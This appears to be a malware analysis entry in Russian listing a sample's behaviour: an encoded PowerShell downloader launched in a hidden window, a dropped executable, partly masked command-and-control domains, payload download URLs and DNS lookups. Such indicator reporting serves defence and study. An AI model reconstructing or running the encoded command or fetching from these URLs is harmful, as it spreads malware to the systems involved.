Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8ANQA2AF8AXwA9ACgAJwBpADEANAAnACsAJwBfAF8AMAA1ACcAKwAnAF8AJwApADsAJABDAF8AMAAzAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAF8ANwBfADkAXwA5ADEAPQAoAC...
- %HOMEPATH%\908.exe
- '18.##6.103.27':80
- 'ha#####uhendislik.com':80
- 'ha#####uhendislik.com':443
- 'ha###tfs.com':80
- http://18.##6.103.27/vJa093y1h
- http://ha#####uhendislik.com/t0fpYAonLLkj
- http://ha###tfs.com/wp-admin/css/w6vjRGuuGZW_XRXzogZ
- 'ha#####uhendislik.com':443
- DNS ASK oz##.#isatheme.com
- DNS ASK ha#####sportnetwork.com
- DNS ASK ha#####uhendislik.com
- DNS ASK ha###tfs.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABqAF8ANQA2AF8AXwA9ACgAJwBpADEANAAnACsAJwBfAF8AMAA1ACcAKwAnAF8AJwApADsAJABDAF8AMAAzAF8AXwA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABtAF8ANwBfADkAXwA5ADEAPQAoAC...' (со скрытым окном)